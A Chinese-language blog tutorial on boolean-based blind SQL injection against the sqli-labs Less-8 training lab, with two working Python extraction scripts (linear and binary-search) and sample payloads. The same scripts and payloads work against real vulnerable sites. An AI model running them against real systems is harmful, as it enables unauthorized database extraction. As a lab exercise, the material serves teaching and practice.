sql注入之bool盲注

已于 2024-05-18 22:46:28 修改
阅读量526 收藏 7
点赞数 15
文章标签: 网络安全
于 2024-05-12 07:41:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/banliyaoguai/article/details/138740278
版权

目录

简介

盲注步骤

1、进入靶场

2、如下图所示输入?id=1‘ 判断此时存在注入点

3、判断列数

​编辑 4、开始盲注

普通的python脚本

代码思想

结果

二分查找python脚本

二分查找算法思想简介

二分查找与普通查找的主要差距

代码思想

代码

结果​编辑

简介

盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。

对于基于布尔的盲注来说,我们可以构造一条注入语句来测试我们输入的布尔表达式,而这布尔表达式结果的真假,决定了每次页面有不同的反应。

下面以sql_labs靶场第八关来理解一下bool盲注

盲注步骤

1、进入靶场

2、如下图所示输入?id=1‘ 判断此时存在注入点

3、判断列数

列又3变为4时You are in.....消失,说明存在三列 

 4、开始盲注

然后我们可以开始进行注入,可以使用substr函数对数据库名进行猜测。对substr切割出来的字符进行一个ascli编码,然后和ascli编码比较,根据结果确定数据库的名称

如下图,当你测试到115时,图中会显示You are in...

然后可以调整sql语句,直到找到database()的名字,但是如果手动一个个的话要花费的时间太久了,所以我们编写一个python脚本来进行盲注

普通的python脚本

代码思想

创建一个字符集然后数据库的每个位置的字符和字符集中的字符进行比对,若两者相等则字符集中字符存入dataname中,最终显示dataname

代码

# 白大黑
# 开发时间:$[DATE] $[TIME]
import requests
def get_database(url):
    dataname = ''  # 初始化一个空字符串用于存储数据库名
    dict = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'  #数据库名可能存在这些字段中
    # 循环数据库名的位置
    for i in range(1, 20):
        for j in dict:
            #注入语句
            payload = "1' AND SUBSTRING((SELECT DATABASE()), %d, 1) = '%s'-- " % (i, j)
            # 发送请求
            res = requests.get(url, params={"id": payload})
            # 如果字符匹配上了,屏幕会输出You are in,所以可以用You are in来检测是否字符是否可以匹配
            if "You are in" in res.text:
                dataname += j
                print(dataname)
                break
            else:
                continue
    return dataname

# 此处填写自己靶场地址
url = 'http://127.0.0.1:9002/sqli-labs-master/Less-8/'
db_name = get_database(url)
结果

二分查找python脚本

但时刚刚的脚本还不是很好,它的查找速率不是很快。所以我们可以对算法进行一下优化,将上面的代码中查找的算法替换成二分查找。

二分查找算法思想简介

二分法的思想很简单,因为整个数组是有序的,数组默认是递增的。

首先选择数组中间的数字和需要查找的目标值比较

如果相等最好,就可以直接返回答案了

如果不相等

如果中间的数字大于目标值,则中间数字向右的所有数字都大于目标值,全部排除

如果中间的数字小于目标值,则中间数字向左的所有数字都小于目标值,全部排除

二分查找与普通查找的主要差距

效率:二分查找的效率远高于普通查找。由于二分查找采用了分治策略,每次都将查找范围缩小一半,因此其时间复杂度为O(log n),而普通查找的时间复杂度为O(n)。

前提条件:二分查找要求数组必须是有序的,而普通查找则没有这一要求。因此,在使用二分查找之前,需要先对数组进行排序。

应用场景:由于二分查找效率高,因此适用于大规模数据的查找;而普通查找则更适用于小规模数据或对数据有序性没有要求的情况。

(正好我们的盲注过程符合二分查找的条件)

代码思想

将要查找的字段编码成ascii码,同ascii码进行比较,ascii相同,该ascii对应的字母就是数据库名称

同ascii进行比较的那一段换成二分法。

代码

# 白大黑
# 开发时间:$[DATE] $[TIME]
import requests
def half(url):
    name = ''
    for i in range(1, 20):
        #从空格开始 直到到~
        low = 32
        high = 126
        mid = (low + high) // 2
        while low < high:
            payload = "1' and ascii(substr(database(),%d,1))> %d-- " % (i, mid)
            params = {"id":payload}
            r = requests.get(url, params=params)
            if 'You are in' in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        name += chr(mid)
        print(name)
url = 'http://127.0.0.1:9002/sqli-labs-master/Less-8/'
half(url)
结果
板栗妖怪
关注
  • 15
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
sql注入练习之bool
windStudyer的专栏
05-22 1124
1.bool的原理 以根据返回页面判断条件真假的注入 判断方式: 通过长度判断 length(): length(database())>=x 通过字符判断 substr():substr(database() ,1,1)= 's' 通过 ascII 码判断:ascii():ascii(substr(database(),1,1)) =x 2.bool相关的函数 3.实验-bool 实验环境:phpstudy+apache+mysql+pikachu 3.1判断注入
iwebsec靶场SQL注入-bool
qq_56041380的博客
03-24 281
bool注入的一种。它于报错注入不同,布尔注入没有任何报错信息输出,页面返回只有正常和不正常两种状态,攻击者只能通过返回的这两种状态来对其进行判断输入的SQL注入语句是否正确,从而判断数据库中存储了那些信息。
SQL注入Bool(510cms)
qq_45775897的博客
01-05 2895
SQL注入之get可以参考: https://blog.csdn.net/qq_45775897/article/details/122332051 一、查找是否存在SQL注入注入点) 以510企业网站为例: 这里以漏洞参数id为例 用?id=1和id=1'进行测试,前提能够正常显示。 在?id=1后面加上and 1=1两个结果都是真的,所以正常输出; 后面加上and 1=2如果正常输出,说明前后都是真的,则表示是字符型。反之是数值型 eg: http://IP地址(域名)/news.php?cid=&
攻防_漏洞_SQL注入_bool
redglare的博客
12-01 1097
import requests import string url = 'http://127.0.0.1:18888/sql/p7/index.php?id=2' #url flag = '' print(len(string.printable)) for i in range(1,30): l,r = 32, 127 while l < r: m = (l+r) // 2 payload = '-if(ascii(substr((select g
SQL注入学习——Bool详解 sqli-labs(Less 8)
未完成的歌~的博客
07-29 6133
Less-7导出文件GET字符型 打开页面输入?id=1 试了很多发现报错信息都一样,查看下源代码: if($row) { echo '<font color= "#FFFF00">'; echo 'You are in.... Use outfile......'; echo "<br>"; echo "</font>"; ......
SQL注入——布尔
TGFXK的博客
03-21 260
原理:前面几关都有数据回显,而在有的界面不会回显数据,只会显示对错,此时查库名等就比较难查,只能根据猜对错来判断。
SQL注入
qq_68233961的博客
07-17 1508
SQL注入之布尔和时间
SQL注入——
金色%夕阳的博客
05-27 1388
sql注入—— 1.回顾 回显注入主要应用于数据库中的数据可以再网站的页面上直接展示出来。 报错注入主要应用于网站的页面上存在原始报错信息,数据库中的数据在原始报错信息中展示出 来。也被称为报错回显。 原理:由于用户不可控输入,攻击者可以任意的输入恶意的sql语句,造成sql语义发生改变,从而引起数据库和操作系统的风险。 风险:数据操作、登录绕过、文件操作、命令执行、册表操作。 防御:过滤、预编译。 2.漏洞场景 1.数据库中的数据并不会在页面上直接展示,将查询出的结果通过判断,将判断之后的结果
mysql bool_SQL注入--及报错注入
weixin_36184835的博客
01-27 198
查询其实就是没有回显,不能直观地得到结果来调整注入数据,只能通过其他方式来得到是否注入成功,主要是利用了一些数据库内置函数来达到的布尔布尔很明显Ture跟Fales,也就是说它只会根据你的注入信息返回Ture跟Fales其实登录处的注入就是布尔型的,万能密码就是构造一个永真的查询,比如下面的select user from test where passwd=‘{injuct}’;#构...
综合bool脚本.py
07-15
可以适用于部分SQL注入题目
超级SQL注入工具,支持布尔,报错,union注入
03-27
超级SQL注入工具目前支持Bool、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 超级SQL注入工具采用C#开发,底层采用Socket发包进行HTTP交互,极大的提升了发包效率,...
超级sql注入工具
11-02
超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP...超级SQL注入工具目前支持Bool、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库
DVWA-SQL脚本(全)
10-04
DVWA SQL,Low,Medium,High 三个级别的bool脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8297
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
SecondactivityMainActivity.java
06-24
SecondactivityMainActivity.java
mmexport1719207093976.jpg
最新发布
06-24
mmexport1719207093976.jpg
百度贴吧 安装包 全球最大的中文社区互动平台
06-24
百度贴吧安装包的相关信息如下: 应用介绍: 百度贴吧APP是全球最大中文社区互动平台,多样化的互动模式及板块都可自由进入,与吧友们一起互动交流。 它是一个以兴趣主题聚合志同道合者的互动平台,用户可以在这里畅所欲言,聊游戏、聊数码、聊动漫、聊收藏、聊手艺、聊运动等,满足各类用户的兴趣需求。 功能特点: 好内容,超懂你:提供专属内容推荐,根据用户兴趣推送相关贴吧和话题。 找同好,聊兴趣:用户可以轻松找到志同道合的吧友,进行深入的交流和讨论。 追热点,玩热梗:快速获取前沿热梗,与吧友一起分享讨论。 找游戏,看榜单:首页游戏中心提供丰富游戏资源和榜单,满足游戏玩家的需求。 主要功能: 兴趣频道:分类展现,精彩内容沉浸体验更过瘾。 话题热榜:热点榜单一手掌握,方便用户了解最新动态。 吧友评价:真实评价一目了然,帮助用户了解贴吧和吧友的情况。 贴吧好物:商品橱窗,吧友推荐一键购买更便捷,为用户提供购物便利。 更新日志: 百度贴吧APP不断更新优化,解决已知问题,提升用户体验。例如,增加了会员装扮升级、小尾巴、头像框等个性化设置,新增了虚拟形象、吧友互助等有趣玩法。
sql数据类型bool
07-28
SQL中的布尔数据类型通常被称为"bit"类型或"boolean"类型,具体取决于DBMS(数据库管理系统)的实现。在大多数DBMS中,布尔类型可以存储两个值:TRUE和FALSE(或者用1和0表示)。 在MySQL中,布尔类型被称为"BOOL"或"TINYINT(1)"。在PostgreSQL中,布尔类型被称为"BOOLEAN"。在Oracle数据库中,可以使用"NUMBER(1)"类型来模拟布尔类型。 以下是在MySQL和PostgreSQL中创建布尔类型列的示例: 在MySQL中: ``` CREATE TABLE example ( is_active BOOL ); ``` 在PostgreSQL中: ``` CREATE TABLE example ( is_active BOOLEAN ); ``` 请意,不同的DBMS可能有不同的方式来表示布尔类型,因此在具体的数据库系统中查找相关的文档以了解更多细节是很重要的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值